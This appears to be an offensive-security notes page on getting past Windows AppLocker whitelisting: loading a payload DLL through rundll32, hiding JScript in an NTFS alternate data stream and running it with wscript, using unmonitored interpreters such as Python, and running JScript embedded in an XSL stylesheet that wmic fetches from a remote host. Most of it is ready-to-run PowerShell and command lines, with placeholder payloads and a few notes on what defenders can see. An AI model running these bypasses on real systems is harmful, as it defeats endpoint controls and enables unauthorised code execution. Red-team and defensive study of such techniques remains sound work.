Application Whitelisting

Bypass using DLLs

By default AppLocker has no DLL rule collection enabled (it has to be turned on explicitly under Advanced rule settings, since it adds a load-time check to every process), so even a host that blocks unapproved executables will usually let rundll32.exe, which lives in C:\Windows\System32 and is allowed by the default Exe rules, load an unmanaged DLL payload from a user-writable path. Check the effective policy for a Dll collection with EnforcementMode="Enabled" before relying on this.
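The check and the launch, as an added PowerShell example that is not part of the original page. The DLL path and the export name EntryPoint are placeholders; the DLL has to export a function with the rundll32 calling convention (void CALLBACK fn(HWND, HINSTANCE, LPSTR, int)).

```powershell
# Added example: confirm the DLL rule collection is not enforced before trying rundll32.
# Get-AppLockerPolicy comes with the AppLocker module on Pro/Enterprise/Server builds.
function Get-AppLockerDllEnforcement {
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    $dll = $policy.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Dll' }
    if (-not $dll) { return 'NotConfigured' }   # no Dll collection at all: DLL loads are not filtered
    return $dll.EnforcementMode                 # 'NotConfigured', 'AuditOnly' or 'Enabled'
}

# Show every collection so the Exe/Script state is visible next to Dll
[xml]$policy = Get-AppLockerPolicy -Effective -Xml
$policy.AppLockerPolicy.RuleCollection | Select-Object Type, EnforcementMode

$mode = Get-AppLockerDllEnforcement
"DLL rule collection: $mode"

if ($mode -ne 'Enabled') {
    # Placeholder path: anywhere the current user can write. rundll32.exe itself is
    # allowed by the default "All files located in the Windows folder" Exe rule.
    $dllPath = 'C:\Users\Public\payload.dll'
    # Placeholder export name: rundll32 calls <dll>,<export> after loading the DLL
    & "$env:SystemRoot\System32\rundll32.exe" "$dllPath,EntryPoint"
}
```

If the collection reports AuditOnly the load still succeeds but is logged to the AppLocker/MSI and Script event log, so treat AuditOnly as "works, but noisy".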

Bypass using ADS

AppLocker's script rules match on the path it is handed, and an alternate data stream on an allowed file (for example whitelisted.txt:payload.js) keeps the allowed file's path. We can therefore write a JScript payload into a whitelisted file's ADS and execute it with WScript. The host file has to be on an NTFS volume, and the ADS must be writable by the current user:

type payload.js > whitelisted.txt:payload.js
wscript whitelisted.txt:payload.js

Caveat: stream creation is visible to defenders. Sysmon Event ID 15 (FileCreateStreamHash) records every ADS write, and dir /r or Get-Item -Stream * lists the stream on the host file.
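The same steps in PowerShell, as an added example that is not from the original page: write the stream, list the streams the way a defender would, run the payload, then remove the stream. File paths are placeholders and the JScript body is a constructed sample.

```powershell
# Added example: JScript payload in an alternate data stream of an allowed file.
$hostFile = 'C:\Users\Public\whitelisted.txt'   # placeholder: a file the Script rules allow
$payload  = 'C:\Users\Public\payload.js'        # placeholder: the JScript to smuggle

# Constructed sample payload; replace with the real script body
Set-Content -Path $payload -Value 'var sh = new ActiveXObject("WScript.Shell"); sh.Popup("ADS payload ran");'

# Make sure the host file exists with ordinary content in its default ($DATA) stream
if (-not (Test-Path $hostFile)) { Set-Content -Path $hostFile -Value 'benign content' }

# Equivalent of: type payload.js > whitelisted.txt:payload.js   (NTFS only)
Set-Content -Path $hostFile -Stream 'payload.js' -Value (Get-Content -Raw $payload)

# What a defender sees: ':$DATA' is the normal content, 'payload.js' is the ADS
Get-Item -Path $hostFile -Stream * | Select-Object Stream, Length

# Equivalent of: wscript whitelisted.txt:payload.js
# AppLocker evaluates the path "whitelisted.txt:payload.js" against the Script rules
& "$env:SystemRoot\System32\wscript.exe" "${hostFile}:payload.js"

# Cleanup: remove only the stream, the host file keeps its original content
Remove-Item -Path $hostFile -Stream 'payload.js'
```

Get-Content -Raw is used so the stream receives the script as a single block rather than an array of lines, which would otherwise be re-joined with a trailing newline per element.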

Bypass using 3rd Party Scripting Engine

AppLocker only evaluates the file types it knows about (executables, DLLs, MSI/MSP/MST installers, packaged apps, and the script extensions .ps1, .bat, .cmd, .vbs and .js). A .py, .rb, .pl or .lua file is not a recognised script type, so if an interpreter such as python.exe is installed in an allowed location (the default rules permit everything under %PROGRAMFILES%), it will run arbitrary scripts and one-liners (python -c "...") with no AppLocker check at all. The same applies to any interpreter bundled with a permitted application.

JScript Execution using XSLT

WMIC can apply an XSL stylesheet to its output, and MSXML's msxsl:script extension allows embedded JScript, so the stylesheet itself becomes the payload. The default namespace must be the XSLT namespace and the user prefix must be bound to a non-empty URI, or MSXML will not honour the script element:

<?xml version='1.0'?>
<stylesheet version="1.0" xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
        var r = new ActiveXObject("WScript.Shell");
        r.Run("calc.exe"); // placeholder command; replace with the payload to launch
    ]]>
    </ms:script>
</stylesheet>

Execute with (the stylesheet can also be given as a local path instead of a URL):

wmic process get brief /format:"http://<ip>/payload.xsl"

Caveat: wmic.exe has been deprecated since Windows 10 21H1 and is no longer installed by default on current Windows 11 builds, so check that it exists on the target before relying on this.
